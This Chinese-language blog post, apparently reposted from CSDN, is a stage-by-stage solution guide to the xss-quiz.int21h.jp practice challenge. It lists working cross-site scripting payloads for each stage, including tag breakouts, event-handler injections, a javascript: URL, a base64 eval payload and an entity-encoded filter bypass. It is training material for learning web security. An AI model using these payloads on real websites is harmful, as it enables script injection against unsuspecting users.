XSS探测

XSS探测

实验地址:https://xss-quiz.int21h.jp/

stage2

"><script>alert(document.domain)</script>

在这里插入图片描述

stage3

于Select中选择即可

Japan</option><script>alert(document.domain);</script>

在这里插入图片描述

stage4

更改input属性,

"><script>alert(document.domain);</script>

在这里插入图片描述

stage5

限制长度
更改长度

"><script>alert(document.domain);</script>

在这里插入图片描述

stage 6

自动翻译成ISO 8859-1字符集,如>实体名称显示&gt

" onmouseover=" alert(document.domain);

stage7

加入

" onmouseover= alert(document.domain)

stage8

通过URL来实现

 javascript:alert(document.domain);

stage9

加入到标签span

onclick="alert(document.domain)" 

stage10

将部分内容用base64加密

"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))</script>

注:bases64为可逆加密

stage11

特殊符号潜入

"><a	href="javascr&#09ipt:alert(document.domain);">xss</a>

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_37697566/article/details/104605729
xss